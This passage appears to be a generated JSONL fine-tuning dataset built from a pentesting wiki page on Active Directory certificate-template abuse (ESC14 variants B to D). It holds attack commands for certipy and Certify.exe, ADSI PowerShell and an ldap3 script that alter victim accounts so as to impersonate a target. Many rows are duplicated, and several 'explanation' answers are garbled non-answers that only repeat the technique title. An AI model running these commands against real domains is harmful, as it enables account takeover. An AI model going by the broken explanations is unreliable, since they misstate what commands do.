covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `import ldap3`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 b) target with x509rfc822 (email). (ESC14 B) Target with X509RFC822 (email)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `import ldap3`?", "response": "This command is used for certificate templates - (esc14 b) target with x509rfc822 (email). (ESC14 B) Target with X509RFC822 (email)", "metadata": {"corpus_index": 118, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the certipy command for certificate templates - (esc14 b) target with x509rfc822 (email)"}, {"role": "assistant", "content": "certipy req -u $VICTIM@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the certipy command for certificate templates - (esc14 b) target with x509rfc822 (email)", "response": "certipy req -u $VICTIM@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP", "metadata": {"corpus_index": 119, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC14 B) Target with X509RFC822 (email)"}, {"role": "assistant", "content": "certipy req -u $VICTIM@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC14 B) Target with X509RFC822 (email)", "response": "certipy req -u $VICTIM@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP", "metadata": {"corpus_index": 119, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy req -u $VICTIM@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 b) target with x509rfc822 (email). (ESC14 B) Target with X509RFC822 (email)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy req -u $VICTIM@$DOMAIN -ca $CA_NAME -template $TEMPLATE -dc-ip $DC_IP`?", "response": "This command is used for certificate templates - (esc14 b) target with x509rfc822 (email). (ESC14 B) Target with X509RFC822 (email)", "metadata": {"corpus_index": 119, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the victim command to certificate templates - (esc14 b) target with x509rfc822 (email)"}, {"role": "assistant", "content": "$victim = [ADSI]\"LDAP://$VICTIM_DN\"\n$victim.Properties[\"mail\"].Value = $TARGET_EMAIL\n$victim.CommitChanges()"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the victim command to certificate templates - (esc14 b) target with x509rfc822 (email)", "response": "$victim = [ADSI]\"LDAP://$VICTIM_DN\"\n$victim.Properties[\"mail\"].Value = $TARGET_EMAIL\n$victim.CommitChanges()", "metadata": {"corpus_index": 120, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "victim"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC14 B) Target with X509RFC822 (email)"}, {"role": "assistant", "content": "$victim = [ADSI]\"LDAP://$VICTIM_DN\"\n$victim.Properties[\"mail\"].Value = $TARGET_EMAIL\n$victim.CommitChanges()"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC14 B) Target with X509RFC822 (email)", "response": "$victim = [ADSI]\"LDAP://$VICTIM_DN\"\n$victim.Properties[\"mail\"].Value = $TARGET_EMAIL\n$victim.CommitChanges()", "metadata": {"corpus_index": 120, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `$victim = [ADSI]\"LDAP://$VICTIM_DN\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 b) target with x509rfc822 (email). (ESC14 B) Target with X509RFC822 (email)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `$victim = [ADSI]\"LDAP://$VICTIM_DN\"`?", "response": "This command is used for certificate templates - (esc14 b) target with x509rfc822 (email). (ESC14 B) Target with X509RFC822 (email)", "metadata": {"corpus_index": 120, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Certify.exe for certificate templates - (esc14 b) target with x509rfc822 (email)?"}, {"role": "assistant", "content": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE_MAIL"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Certify.exe for certificate templates - (esc14 b) target with x509rfc822 (email)?", "response": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE_MAIL", "metadata": {"corpus_index": 121, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Certify.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - (ESC14 B) Target with X509RFC822 (email)?"}, {"role": "assistant", "content": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE_MAIL"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - (ESC14 B) Target with X509RFC822 (email)?", "response": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE_MAIL", "metadata": {"corpus_index": 121, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Certify.exe request /ca:domain\\ca /template:$TEMPLATE_MAIL`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 b) target with x509rfc822 (email). (ESC14 B) Target with X509RFC822 (email)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Certify.exe request /ca:domain\\ca /template:$TEMPLATE_MAIL`?", "response": "This command is used for certificate templates - (esc14 b) target with x509rfc822 (email). (ESC14 B) Target with X509RFC822 (email)", "metadata": {"corpus_index": 121, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Certificate templates - (ESC14 C) Target with X509IssuerSubject?"}, {"role": "assistant", "content": "The target has an explicit weak mapping of type X509IssuerSubject. The attacker can modify the cn or dNSHostName attribute of the victim to match the subject of the X509IssuerSubject mapping of the target. It is then possible to enroll on the certificate template with the victim, and use the resulting certificate to authenticate as the target.\n\nFor this attack, _some_ additional prerequisites are necessary:\n\n> [!WARNING]\n> * The target already has at least one X509IssuerSubject mapping in altSecurityIdentities\n> * If the victim is a user:\n > * The attacker can modify the cn and name attributes of the victim (to change the cn, the name must match)\n > * If the target is a user and the X509IssuerSubject mapping has the current value of the cn attribute of the target as its identifier, the victim and the target cannot be in the same container (the DC will not allow the cn of the victim to be set according to the cn of the target if they are in the same container, as this would mean that they have the same distinguishedName)\n> * If the victim is a machine: the attacker has write access to the dNSHostName attribute\n> * The certificate template indicates CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag (except for Schannel authentication with the DC having the CertificateMappingMethods key set to 0x1)\n> * The template has one of the following flags in msPKI-Certificate-Name-Flag: CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME or CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN\n> * The certificate does not have any of the following flags: CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH and CT_FLAG_SUBJECT_REQUIRE_EMAIL\n> * The enterprise PKI is the issuer referenced by IssuerName in the X509IssuerSubject mapping of the target\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1, or CertificateMappingMethods is set to 0x1\n\nIn this example, the target has the explicit mapping"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Certificate templates - (ESC14 C) Target with X509IssuerSubject?", "response": "The target has an explicit weak mapping of type X509IssuerSubject. The attacker can modify the cn or dNSHostName attribute of the victim to match the subject of the X509IssuerSubject mapping of the target. It is then possible to enroll on the certificate template with the victim, and use the resulting certificate to authenticate as the target.\n\nFor this attack, _some_ additional prerequisites are necessary:\n\n> [!WARNING]\n> * The target already has at least one X509IssuerSubject mapping in altSecurityIdentities\n> * If the victim is a user:\n > * The attacker can modify the cn and name attributes of the victim (to change the cn, the name must match)\n > * If the target is a user and the X509IssuerSubject mapping has the current value of the cn attribute of the target as its identifier, the victim and the target cannot be in the same container (the DC will not allow the cn of the victim to be set according to the cn of the target if they are in the same container, as this would mean that they have the same distinguishedName)\n> * If the victim is a machine: the attacker has write access to the dNSHostName attribute\n> * The certificate template indicates CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag (except for Schannel authentication with the DC having the CertificateMappingMethods key set to 0x1)\n> * The template has one of the following flags in msPKI-Certificate-Name-Flag: CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME or CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN\n> * The certificate does not have any of the following flags: CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH and CT_FLAG_SUBJECT_REQUIRE_EMAIL\n> * The enterprise PKI is the issuer referenced by IssuerName in the X509IssuerSubject mapping of the target\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1, or CertificateMappingMethods is set to 0x1\n\nIn this example, the target has the explicit mapping", "metadata": {"corpus_index": 122, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - (ESC14 C) Target with X509IssuerSubject?"}, {"role": "assistant", "content": "The target has an explicit weak mapping of type X509IssuerSubject. The attacker can modify the cn or dNSHostName attribute of the victim to match the subject of the X509IssuerSubject mapping of the target. It is then possible to enroll on the certificate template with the victim, and use the resulting certificate to authenticate as the target.\n\nFor this attack, _some_ additional prerequisites are necessary:\n\n> [!WARNING]\n> * The target already has at least one X509IssuerSubject mapping in altSecurityIdentities\n> * If the victim is a user:\n > * The attacker can modify the cn and name attributes of the victim (to change the cn, the name must match)\n > * If the target is a user and the X509IssuerSubject mapping has the current value of the cn attribute of the target as its identifier, the victim and the target cannot be in the same container (the DC will not allow the cn of the victim to be set according to the cn of the target if they are in the same container, as this would mean that they have the same distinguishedName)\n> * If the victim is a machine: the attacker has write access to the dNSHostName attribute\n> * The certificate template indicates CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag (except for Schannel authentication with the DC having the CertificateMappingMethods key set to 0x1)\n> * The template has one of the following flags in msPKI-Certificate-Name-Flag: CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME or CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN\n> * The certificate does not have any of the following flags: CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH and CT_FLAG_SUBJECT_REQUIRE_EMAIL\n> * The enterprise PKI is the issuer referenced by IssuerName in the X509IssuerSubject mapping of the target\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1, or CertificateMappingMethods is set to 0x1\n\nIn this example, the target has the explicit mapping"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - (ESC14 C) Target with X509IssuerSubject?", "response": "The target has an explicit weak mapping of type X509IssuerSubject. The attacker can modify the cn or dNSHostName attribute of the victim to match the subject of the X509IssuerSubject mapping of the target. It is then possible to enroll on the certificate template with the victim, and use the resulting certificate to authenticate as the target.\n\nFor this attack, _some_ additional prerequisites are necessary:\n\n> [!WARNING]\n> * The target already has at least one X509IssuerSubject mapping in altSecurityIdentities\n> * If the victim is a user:\n > * The attacker can modify the cn and name attributes of the victim (to change the cn, the name must match)\n > * If the target is a user and the X509IssuerSubject mapping has the current value of the cn attribute of the target as its identifier, the victim and the target cannot be in the same container (the DC will not allow the cn of the victim to be set according to the cn of the target if they are in the same container, as this would mean that they have the same distinguishedName)\n> * If the victim is a machine: the attacker has write access to the dNSHostName attribute\n> * The certificate template indicates CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag (except for Schannel authentication with the DC having the CertificateMappingMethods key set to 0x1)\n> * The template has one of the following flags in msPKI-Certificate-Name-Flag: CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME or CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN\n> * The certificate does not have any of the following flags: CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH and CT_FLAG_SUBJECT_REQUIRE_EMAIL\n> * The enterprise PKI is the issuer referenced by IssuerName in the X509IssuerSubject mapping of the target\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1, or CertificateMappingMethods is set to 0x1\n\nIn this example, the target has the explicit mapping", "metadata": {"corpus_index": 122, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the import command for certificate templates - (esc14 c) target with x509issuersubject"}, {"role": "assistant", "content": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"CN=,CN=Computers,DC=domain,DC=local\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify_dn(\n victim_dn,\n 'CN=.'\n)\n\nconn.unbind()"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the import command for certificate templates - (esc14 c) target with x509issuersubject", "response": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"CN=,CN=Computers,DC=domain,DC=local\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify_dn(\n victim_dn,\n 'CN=.'\n)\n\nconn.unbind()", "metadata": {"corpus_index": 123, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "import"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate templates - (ESC14 C) Target with X509IssuerSubject"}, {"role": "assistant", "content": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"CN=,CN=Computers,DC=domain,DC=local\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify_dn(\n victim_dn,\n 'CN=.'\n)\n\nconn.unbind()"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate templates - (ESC14 C) Target with X509IssuerSubject", "response": "import ldap3\n\nserver = ldap3.Server('')\nvictim_dn = \"CN=,CN=Computers,DC=domain,DC=local\"\nattacker_username = \"\\\\\"\nattacker_password = \"\"\n\nconn = ldap3.Connection(\n server=server,\n user=attacker_username,\n password=attacker_password,\n authentication=ldap3.NTLM\n)\nconn.bind()\n\nconn.modify_dn(\n victim_dn,\n 'CN=.'\n)\n\nconn.unbind()", "metadata": {"corpus_index": 123, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `import ldap3`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 c) target with x509issuersubject. (ESC14 C) Target with X509IssuerSubject"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `import ldap3`?", "response": "This command is used for certificate templates - (esc14 c) target with x509issuersubject. (ESC14 C) Target with X509IssuerSubject", "metadata": {"corpus_index": 123, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the victim command to certificate templates - (esc14 c) target with x509issuersubject"}, {"role": "assistant", "content": "$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Users,DC=domain,DC=local\"\n$victim.Rename(\"CN=$TARGET.domain.local\")\nGet-ADUser $VICTIM"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the victim command to certificate templates - (esc14 c) target with x509issuersubject", "response": "$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Users,DC=domain,DC=local\"\n$victim.Rename(\"CN=$TARGET.domain.local\")\nGet-ADUser $VICTIM", "metadata": {"corpus_index": 124, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "victim"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate templates - (ESC14 C) Target with X509IssuerSubject during a pentest?"}, {"role": "assistant", "content": "$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Users,DC=domain,DC=local\"\n$victim.Rename(\"CN=$TARGET.domain.local\")\nGet-ADUser $VICTIM"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate templates - (ESC14 C) Target with X509IssuerSubject during a pentest?", "response": "$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Users,DC=domain,DC=local\"\n$victim.Rename(\"CN=$TARGET.domain.local\")\nGet-ADUser $VICTIM", "metadata": {"corpus_index": 124, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Users,DC=domain,DC=local\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 c) target with x509issuersubject. (ESC14 C) Target with X509IssuerSubject"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `$victim = [ADSI]\"LDAP://CN=$VICTIM,CN=Users,DC=domain,DC=local\"`?", "response": "This command is used for certificate templates - (esc14 c) target with x509issuersubject. (ESC14 C) Target with X509IssuerSubject", "metadata": {"corpus_index": 124, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Certify.exe command for certificate templates - (esc14 c) target with x509issuersubject"}, {"role": "assistant", "content": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Certify.exe command for certificate templates - (esc14 c) target with x509issuersubject", "response": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE", "metadata": {"corpus_index": 125, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Certify.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate templates - (ESC14 C) Target with X509IssuerSubject"}, {"role": "assistant", "content": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate templates - (ESC14 C) Target with X509IssuerSubject", "response": "Certify.exe request /ca:domain\\ca /template:$TEMPLATE", "metadata": {"corpus_index": 125, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Certify.exe request /ca:domain\\ca /template:$TEMPLATE`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14 c) target with x509issuersubject. (ESC14 C) Target with X509IssuerSubject"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Certify.exe request /ca:domain\\ca /template:$TEMPLATE`?", "response": "This command is used for certificate templates - (esc14 c) target with x509issuersubject. (ESC14 C) Target with X509IssuerSubject", "metadata": {"corpus_index": 125, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Certificate templates - (ESC14 D) Target with X509SubjectOnly?"}, {"role": "assistant", "content": "The target has an explicit weak mapping of type X509SubjectOnly. The attacker can modify the cn or dNSHostName attribute of the victim to match the subject of the X509SubjectOnly mapping of the target. It is then possible to enroll on the certificate template with the victim, and use the resulting certificate to authenticate as the target.\n\nFor this attack, _some_ additional prerequisites are necessary:\n\n> [!WARNING]\n> * The target already has at least one X509SubjectOnly mapping in altSecurityIdentities\n> * If the victim is a user:\n > * The attacker can modify the cn and name attributes of the victim (to change the cn, the name must match)\n > * If the target is a user and the X509SubjectOnly mapping has the current value of the cn attribute of the target as its identifier, the victim and the target cannot be in the same container (the DC will not allow the cn of the victim to be set according to the cn of the target if they are in the same container, as this would mean that they have the same distinguishedName)\n> * If the victim is a machine: the attacker has write access to the dNSHostName attribute\n> * The certificate template indicates CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag\n> * The template has one of the following flags in msPKI-Certificate-Name-Flag: CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME or CT_FLAG_SUBJECT_REQUIRE_DNS_AS_CN\n> * The certificate does not have any of the following flags: CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH and CT_FLAG_SUBJECT_REQUIRE_EMAIL\n> * For PKINIT, StrongCertificateBindingEnforcement is set to 0 or 1\n> * For Schannel, CertificateMappingMethods indicates 0x8 and StrongCertificateBindingEnforcement is set to 0 or 1\n\nIn this example, the target has the explicit mapping value X509:CN=TARGET. One must change the dNSHostName of the victim (in this case a computer) to equal $TARGET.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, the dNSHostName attribute of the victim can be overwritten with the following python script to b"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Certificate templates - (ESC14 D) Target with X509SubjectOnly?", "response": "The target has an explicit weak mapping of type X509SubjectOnly. The attacker can modify the cn or dNSHostName attribute of the victim to match the subject of the X509SubjectOnly mapping of the target. It is then possible to enroll on the certificate template with the victim, and use the resulting certificate to authenticate as the target.\n\nFor this attack, _some_ additional prerequisites are necessary:\n\n> [!WARNING]\n> * The target already has at least one X509SubjectOnly mapping in altSecurityIdentities\n> * If the victim is a user:\n > * The attacker can modify the cn and name attributes of the victim (to change the cn, the name must match)\n > * If the target is a user and the X509SubjectOnly mapping has the current value of the cn attribute of the target as its identifier, the victim and the target cannot be in the same container (the DC will not allow the cn of the victim to be set according to the cn of the target if they are in the same container, as this would mean that they have the same distinguishedName)\n> * If the victim is a machine: the attacker has write access to the dNSHostName attribute\n> * The certificate template indicates CT_FLAG_NO_SECURITY_EXTENSION in msPKI-Enrollment-Flag\n> * The template has one of the following flags in msPKI-Certificate-Name-Flag: CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME or 